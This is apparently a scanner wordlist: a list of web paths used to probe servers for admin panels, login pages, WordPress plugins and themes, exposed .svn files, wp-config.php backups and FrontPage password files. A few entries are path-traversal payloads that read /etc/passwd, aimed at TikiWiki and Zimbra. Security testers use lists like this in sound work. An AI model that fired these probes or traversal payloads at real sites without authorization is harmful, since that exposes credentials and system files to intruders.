/sites/all/themes/sky/LICENSE.txt
/sites/all/themes/tao/LICENSE.txt
/sites/all/themes/tb_purity/LICENSE.txt
/sites/all/themes/tb_sirate/LICENSE.txt
/sites/all/themes/tma/LICENSE.txt
/sites/all/themes/touch/LICENSE.txt
/sites/all/themes/urbansolice/LICENSE.txt
/sites/all/themes/venture_theme/LICENSE.txt
/sites/all/themes/zen/LICENSE.txt
/sites/all/themes/zeropoint/LICENSE.txt
/sites/all/themes/zircon/LICENSE.txt
/sites/all/themes/zurb_foundation/LICENSE.txt
/siteserver/
/sitestats/
/siteupdate/
/skins/default/images/roundcube_logo.png
/smbcfg.nsf
/smconf.nsf
/smency.nsf
/smf/
/smhelp.nsf
/smmsg.nsf
/smquar.nsf
/smreports/
/smreportsviewer/
/smsolar.nsf
/smtime.nsf
/smtp.box
/smtpibwq.nsf
/smtp.nsf
/smtpobwq.nsf
/smvlog.nsf
/soap/
/soapdocs/
/software/
/solaris/
/source/
/sourcebans/
/spaw/demo.php
/spControl.php
/splashfrog/
/sql/
/sqlmanager/
/squid/
/squirrelmail/images/sm_logo.png
/squirrelmail/src/login.php
/src/
/srchadm/
/src/login.php
/srvnam.htm
/ssi/
/ssl/
/sslkeys/
/staff/
/stat/
/state/
/statistic/
/statistics/
/statmail.nsf
/statrep.nsf
/stats/
/stats-bin-p/
/stats_old/
/status/
/statusnet/
/statusnet/README
/status/README
/stauths.nsf
/stautht.nsf
/stconfig.nsf
/stconf.nsf
/stdnaset.nsf
/stdomino.nsf
/stlog.nsf
/storage/
/store/
/StoreDB/
/store/docs/
/storemgr/
/store.php?action=view_cart
/streg.nsf
/stronghold-info/
/stronghold-status/
/stsrc.nsf
/stuff/
/style/
/styles/
/stylesheet/
/stylesheets/
/subir/
/sun/
/super_stats/
/supplier/
/suppliers/
/supply/
/support/
/supporter/
/survey/
/.svn/
/svn/
/.svn/text-base/.htaccess.svn-base
/.svn/text-base/.htpasswd.svn-base
/.svn/text-base/Web.config.svn-base
/sw/auth/login.aspx
/swfupload/index.php
/switchSystem.html
/_sys/
/sys/
/~sysadmin
/sysadmin/
/sysbackup/
/syssite/
/system/
/system-admin/
/system/admin/
/systemadmin/
/system/admin/comments_items.php
/system/admin/header.php
/system_administration/
/system-administration/
/system-administrators/
/system-admins/
/system/console
//system.html
/system/login/
/system/login/reset?next=%2Fsystem%2Flogin&set-lang=en
/systems/
/system/user/scn_user_list
/t/
/t3lib/README.txt
/tags/appsec
/tags/appsec/
/tags/backdoor
/tags/backdoor/
/tags/backdoor/?callback=test
/tags/backdoor/?call=test
/tags/backdoor/?cb=test
/tags/backdoor/?jcb=test
/tags/backdoor/?jsonpcallback=test
/tags/backdoor/?jsonp=test
/tags/ccdc
/tags/ccdc/
/tags/cobaltstrike
/tags/cobaltstrike/
/tags/cobtaltstrike
/tags/cobtaltstrike/
/tags/elasticsearch
/tags/elasticsearch/
/tags/empire
/tags/empire/
/tags/express
/tags/express/
/tags/express/?callback=test
/tags/express/?call=test
/tags/express/?cb=test
/tags/express/?jcb=test
/tags/express/?jsonpcallback=test
/tags/express/?jsonp=test
/tags/instrumentation
/tags/instrumentation/
/tags/nginx
/tags/nginx/
/tags/node.js
/tags/node.js/
/tags/node.js/?callback=test
/tags/node.js/?call=test
/tags/node.js/?cb=test
/tags/node.js/Copy%20(2)%20of%20node.js/
/tags/node.js/Copy%20of%20node.js/
/tags/node.js/?jcb=test
/tags/node.js/?jsonpcallback=test
/tags/node.js/?jsonp=test
/tags/node.js/node%20copy.js/
/tags/node.js/node.bak
/tags/node.js/node.js/~
/tags/node.js/node.js/.1
/tags/node.js/node.js/.~1~
/tags/openvpn
/tags/openvpn/
/tags/python
/tags/python/
/tags/recruiting
/tags/recruiting/
/tags/redirector
/tags/redirector/
/tags/redis
/tags/redis/
/tags/redteam
/tags/redteam/
/tags/rtt
/tags/rtt/
/tags/slack
/tags/slack/
/tags/socat
/tags/socat/
/tags/supervisord
/tags/supervisord/
/tags/telemetry
/tags/telemetry/
/tags/telemetry/?callback=test
/tags/telemetry/?call=test
/tags/telemetry/?cb=test
/tags/telemetry/?jcb=test
/tags/telemetry/?jsonpcallback=test
/tags/telemetry/?jsonp=test
/tar/
/target/
/tarjetas/
/tbook.csv
/tech/
/technote/
/te_html/
/Telerik.Web.UI.DialogHandler.ashx?dp=////
/Telerik.Web.UI.DialogHandler.aspx?dp=////
/temp/
/template/
/templates/
/templates1/view_product.php
/templates/beez/css/template_rtl.css
/templates/system/css/toolbar.css
/temporal/
/~test
/test/
/?test=43
/?test=64
/?test=84
/?test=9
/?test=97
/test.asp
/test-cgi/
/test.class
/test.htm
/test.html
/testing/
/test/logon.html
/test.php
/tests/
/test.txt
/testweb/
/theme/images/en/login1.gif
/themes/
/ticket/
/tickets/
/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234
/tikiwiki/
/tinybrowser/upload.php
/tinymce/changelog.txt
/tiny_mce/plugins/filemanager/
/tinymcpuk/filemanager/browser.html
/tip/
/tips/
/tmp/
/ToDo/
/tomcat/manager/html/
/tool/
/tools/
/tools_admin.cgi?
/tools_admin.php
/tools/filemanager/skins/mobile/admin1.template.php
/top/
/TopAccess/
/TopAccess/images/RioGrande/Rio_PPC.gif
/TopToolArea.html
/tpv/
/trabajo/
/trac/
/trace/
/track/
/tracking/
/training/
/training/?callback=test
/training/?call=test
/training/?cb=test
/training/?jcb=test
/training/?jsonpcallback=test
/training/?jsonp=test
/training/x11/
/transfer/
/transito/
/transpolar/
/tree/
/trees/
/trick/
/tricks/
/ts/in.cgi?open2
/tsweb/
/twitter/README
/typo3/index.php
/typo3/README.txt
/typo3/sysext/t3skin/images/login/typo3logo-white-greyback.gif
/u/
/u02/
/ui/
/ui/authentication/
/ui/imx/vmwareLogo-16x16.png
/ui/imx/vmwarePaperBagLogo-16x16.png
/ui/vManage.do
/unix/
/unknown/
/update.php
/updates/
/updown.php
/UPGRADE.txt
/upload/
/upload/data/settings.cdb
/Uploadify/
/upload/includes/js/files/upload.php
/upload_multiple_js.php
/uploads/
/upload/scp/ajax.php
/uploadsnaps.php
/uploadtester.asp
/us/
/usage/
/~user
/user/
/user.asp
/user.aspx
/user.cfm
/userdb/
/user.html
/user.jsp
/user.php
/userreg.nsf
/users/
/users.sql
/usr/
/ustats/
/usuario/
/usuarios/
/usuarios.sql
/util/
/utils/
/v/
/vanilla/
/vanillaforum/
/vanillaforums/
/vb/bnnr.php
/vbseo.php
/vendor/
/vfs/
/vhosts/ehcp/?op=applyforaccount
/vhosts/ehcp/?op=applyfordomainaccount
/vhosts/ehcp/?op=applyforftpaccount
/view/
/view/index.shtml
/view/viewer_index.shtml
/vmware/
/vmware/imx/vmware_boxes-16x16.png
/vpn/
/vpn/images/AccessGateway.ico
/vpuserinfo.nsf
/_vti_bin/
/_vti_bin/fpcount.exe?Page=default.asp|Image=3
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_adm/admin.exe
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_cnf/
//_vti_inf.html
/_vti_log/
/_vti_pvt/
/_vti_pvt/access.cnf
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/botinfs.cnf
/_vti_pvt/bots.cnf
/_vti_pvt/deptodoc.btr
/_vti_pvt/doctodep.btr
/_vti_pvt/frontpg.lck
/_vti_pvt/linkinfo.cnf
/_vti_pvt/service.cnf
/_vti_pvt/service.grp
/_vti_pvt/service.lck
/_vti_pvt/service.pwd
/_vti_pvt/services.cnf
/_vti_pvt/services.org
/_vti_pvt/Service.stp
/_vti_pvt/structure.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/uniqueperm.cnf
/_vti_pvt/users.pwd
/_vti_pvt/writeto.cnf
/_vti_pvt/_x_todoh.htm
/_vti_pvt/_x_todo.htm
/_vti_txt/
/vti_txt/
/VTLOOHALMPXIEPZH
/w/
/w2000/
/w2k/
/w3perl/
/w-agora/
/way-board/
/~web
/web/
/web800fo/
/webaccess/
/~webadmin
/webadmin/
/webAdmin/
/webadmin/admin.asp
/webadmin/admin.aspx
/webadmin/admin.cfm
/webadmin/admin.html
/webadmin/admin.jsp
/webadmin/admin.php
/webadmin.asp
/webadmin.aspx
/webadmin.cfm
/webadmin.html
/webadmin/index.asp
/webadmin/index.aspx
/webadmin/index.cfm
/webadmin/index.html
/webadmin/index.jsp
/webadmin/index.php
/webadmin.jsp
/webadmin/login.asp
/webadmin/login.aspx
/webadmin/login.cfm
/webadmin/login.html
/webadmin/login.jsp
/webadmin/login.php
/webadmin.nsf
/webadmin.php
/webalizer/
/webapps/
/WebBank/
/webboard/
/WebCalendar/
/webcart/
/webcart-lite/
/webcgi/
/web-console/Invoker
/web-console/ServerInfo.jsp
/webdata/
/webdav/
/webdb/
/webDB/
/webedition/
/webedition/we/include/we_modules/
/webimages/
/webimages2/
/web-inf/
/webline/html/admin/wcs/LoginPage.jhtml
/webline/html/agent/AgentFrame.jhtml
/webline/html/agent/default/badlogin.jhtml
/webline/html/forms/callbackICM.jhtml
/webline/html/forms/callback.jhtml
/webline/html/multichatui/nowDefunctWindow.jhtml
/weblink_cat_list.php
/weblog/
/weblogs/
/weblog/wp-login.php
/webmail/
/webmail/images/sm_logo.png
/webmail/src/login.php
/webmaster/
/webmaster_logs/
/webMathematica/
/web.nsf
/webpub/
/webpub-ui/
/webreports/
/webreps/
/webshare/
/WebShop/
/website/
/websql/
/webstat/
/webstats/
/webstore/
/Web_store/
/websvn/
/webtrace/
/WebTrend/
/webtrends/
/web_usage/
/wiki/
/wiki/Main_Page
/wiki/rankings.php
/win/
/win2k/
/window/
/windows/
/winnt/
/word/
/wordpress/
/wordpress/wp-login.php
/work/
/workflowtasks/allitems.aspx
/workorder/FileDownload.jsp
/world/
/wp-admin/upgrade.php
/wp-config%20copy.php
/wp-config.bak
/wp-config.php~
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.save
/.wp-config.php.swp
/wp-config.php.swp
/wp-content/plugins/addthis/
/wp-content/plugins/add-to-any/
/wp-content/plugins/advanced-custom-fields/
/wp-content/plugins/akismet/
/wp-content/plugins/all-in-one-seo-pack/
/wp-content/plugins/all-in-one-wp-migration/
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-content/plugins/backupwordpress/
/wp-content/plugins/backwpup/
/wp-content/plugins/bbpress/
/wp-content/plugins/better-wp-security/
/wp-content/plugins/black-studio-tinymce-widget/
/wp-content/plugins/breadcrumb-navxt/
/wp-content/plugins/broken-link-checker/
/wp-content/plugins/buddypress/
/wp-content/plugins/bulletproof-security/
/wp-content/plugins/captcha/
/wp-content/plugins/contact-bank/
/wp-content/plugins/contact-form-7/
/wp-content/plugins/contact-form-plugin/
/wp-content/plugins/custom-post-type-ui/
/wp-content/plugins/disable-comments/
/wp-content/plugins/disqus-comment-system/
/wp-content/plugins/duplicate-post/
/wp-content/plugins/duplicator/
/wp-content/plugins/ewww-image-optimizer/
/wp-content/plugins/facebook/
/wp-content/plugins/formidable/
/wp-content/plugins/gallery-bank/
/wp-content/plugins/google-analyticator/
/wp-content/plugins/googleanalytics/
/wp-content/plugins/google-analytics-dashboard-for-wp/
/wp-content/plugins/google-analytics-for-wordpress/
/wp-content/plugins/google-sitemap-generator/
/wp-content/plugins/gtranslate/
/wp-content/plugins/image-widget/
/wp-content/plugins/iwp-client/
/wp-content/plugins/jetpack/
/wp-content/plugins/mailchimp-for-wp/
/wp-content/plugins/maintenance/
/wp-content/plugins/ml-slider/
/wp-content/plugins/newsletter/
/wp-content/plugins/nextgen-facebook/
/wp-content/plugins/nextgen-gallery/
/wp-content/plugins/ninja-forms/
/wp-content/plugins/page-links-to/
/wp-content/plugins/photo-gallery/
/wp-content/plugins/polylang/
/wp-content/plugins/post-types-order/
/wp-content/plugins/really-simple-captcha/
/wp-content/plugins/redirection/
/wp-content/plugins/redux-framework/
/wp-content/plugins/regenerate-thumbnails/
/wp-content/plugins/seo-ultimate/
/wp-content/plugins/shareaholic/
/wp-content/plugins/share-this/
/wp-content/plugins/shortcodes-ultimate/
/wp-content/plugins/si-captcha-for-wordpress/
/wp-content/plugins/si-contact-form/
/wp-content/plugins/siteorigin-panels/
/wp-content/plugins/sociable/
/wp-content/plugins/social-networks-auto-poster-facebook-twitter-g/
/wp-content/plugins/so-widgets-bundle/
/wp-content/plugins/squirrly-seo/
/wp-content/plugins/tablepress/
/wp-content/plugins/the-events-calendar/
/wp-content/plugins/tinymce-advanced/
/wp-content/plugins/types/
/wp-content/plugins/ultimate-tinymce/
/wp-content/plugins/updraftplus/
/wp-content/plugins/user-role-editor/
/wp-content/plugins/w3-total-cache/
/wp-content/plugins/woocommerce/
/wp-content/plugins/wordfence/
/wp-content/plugins/wordpress-importer/
/wp-content/plugins/wordpress-seo/
/wp-content/plugins/worker/
/wp-content/plugins/wp-db-backup/
/wp-content/plugins/wp-e-commerce/
/wp-content/plugins/wp-fastest-cache/
/wp-content/plugins/wp-google-maps/
/wp-content/plugins/wp-mail-smtp/
/wp-content/plugins/wp-maintenance-mode/
/wp-content/plugins/wp-multibyte-patch/
/wp-content/plugins/wp-optimize/
/wp-content/plugins/wp-pagenavi/
/wp-content/plugins/wp-polls/
/wp-content/plugins/wp-postviews/
/wp-content/plugins/wp-retina-2x/
/wp-content/plugins/wp-slimstat/
/wp-content/plugins/wp-smushit/
/wp-content/plugins/wp-spamshield/
/wp-content/plugins/wp-statistics/
/wp-content/plugins/wp-super-cache/
/wp-content/plugins/wp-to-twitter/
/wp-content/plugins/wptouch/
/wp-content/plugins/wysija-newsletters/
/wp-content/plugins/yet-another-related-posts-plugin/
/wp-content/plugins/yith-woocommerce-wishlist/
/wp-content/plugins/youtube-embed-plus/
/wp-content/themes/accelerate/
/wp-content/themes/accesspress-lite/
/wp-content/themes/accesspress-parallax/
/wp-content/themes/alexandria/
/wp-content/themes/arcade-basic/
/wp-content/themes/atahualpa/
/wp-content/themes/attitude/
/wp-content/themes/beach/
/wp-content/themes/bouquet/
/wp-content/themes/business-lite/
/wp-content/themes/catch-box/
/wp-content/themes/chaostheory/
/wp-content/themes/colormag/
/wp-content/themes/colorway/
/wp-content/themes/constructor/
/wp-content/themes/coraline/
/wp-content/themes/custom-community/
/wp-content/themes/customizr/
/wp-content/themes/dazzling/
/wp-content/themes/delicate/
/wp-content/themes/destro/
/wp-content/themes/dusk-to-dawn/
/wp-content/themes/duster/
/wp-content/themes/dynamic-news-lite/
/wp-content/themes/eclipse/
/wp-content/themes/enigma/
/wp-content/themes/esquire/
/wp-content/themes/evolve/
/wp-content/themes/flat/
/wp-content/themes/fruitful/
/wp-content/themes/generatepress/
/wp-content/themes/graphene/
/wp-content/themes/hatch/
/wp-content/themes/hemingway/
/wp-content/themes/hueman/
/wp-content/themes/iconic-one/
/wp-content/themes/ifeature/
/wp-content/themes/inove/
/wp-content/themes/lightword/
/wp-content/themes/llorix-one-lite/
/wp-content/themes/magazine-basic/
/wp-content/themes/make/
/wp-content/themes/mantra/
/wp-content/themes/mh-magazine-lite/
/wp-content/themes/minamaze/
/wp-content/themes/minimatica/
/wp-content/themes/moesia/
/wp-content/themes/motion/
/wp-content/themes/mystique/
/wp-content/themes/news/
/wp-content/themes/next-saturday/
/wp-content/themes/nirvana/
/wp-content/themes/omega/
/wp-content/themes/one-page/
/wp-content/themes/onepress/
/wp-content/themes/onetone/
/wp-content/themes/optimizer/
/wp-content/themes/oxygen/
/wp-content/themes/p2/
/wp-content/themes/parabola/
/wp-content/themes/parament/
/wp-content/themes/pilcrow/
/wp-content/themes/pinboard/
/wp-content/themes/pink-touch-2/
/wp-content/themes/pixel/
/wp-content/themes/point/
/wp-content/themes/portfolio-press/
/wp-content/themes/radiate/
/wp-content/themes/raindrops/
/wp-content/themes/responsive/
/wp-content/themes/simple-catch/
/wp-content/themes/sixteen/
/wp-content/themes/sliding-door/
/wp-content/themes/spacious/
/wp-content/themes/sparkling/
/wp-content/themes/spun/
/wp-content/themes/steira/
/wp-content/themes/storefront/
/wp-content/themes/suevafree/
/wp-content/themes/sundance/
/wp-content/themes/sunspot/
/wp-content/themes/swift/
/wp-content/themes/swift-basic/
/wp-content/themes/sydney/
/wp-content/themes/tempera/
/wp-content/themes/thematic/
/wp-content/themes/travelify/
/wp-content/themes/twentyeleven/
/wp-content/themes/twentyfifteen/
/wp-content/themes/twentyfourteen/
/wp-content/themes/twentyseventeen/
/wp-content/themes/twentysixteen/
/wp-content/themes/twentyten/
/wp-content/themes/twentythirteen/
/wp-content/themes/twentytwelve/
/wp-content/themes/vantage/
/wp-content/themes/virtue/
/wp-content/themes/wp-creativix/
/wp-content/themes/zbench/
/wp-content/themes/zerif-lite/
/wp-includes/images/blank.gif
/wp-includes/images/rss.png
/wp-includes/js/codepress/codepress.js
/wp-includes/js/comment-reply.js
/wp-includes/js/jquery/suggest.js
/wp-includes/js/scriptaculous/sound.js
/wp%-login
/wp-login.php
/wsdocs/
/WS_FTP/
/wstats/
/wusage/
/www/
/www0/
/www2/
/www3/
/www4/
/www/admin/index.php
/wwwjoin/
/wwwlog/
/wwwlogs/
/wwwrooot/
/www-sql/
/wwwstat/
/wwwstats/
/x/
/xGB/
/x_logo.gif
/xml/
/xoda/
/xoda/README
/XSL/
/xtemp/
/xymon/
/xymon/menu/menu.css
/y/
/YUI-upload/html
/z/
/zabbix/
/zb41/
/zencart/docs/
/zikula/index.php
/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00
/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/zip/
/zipfiles/
/zp-core/
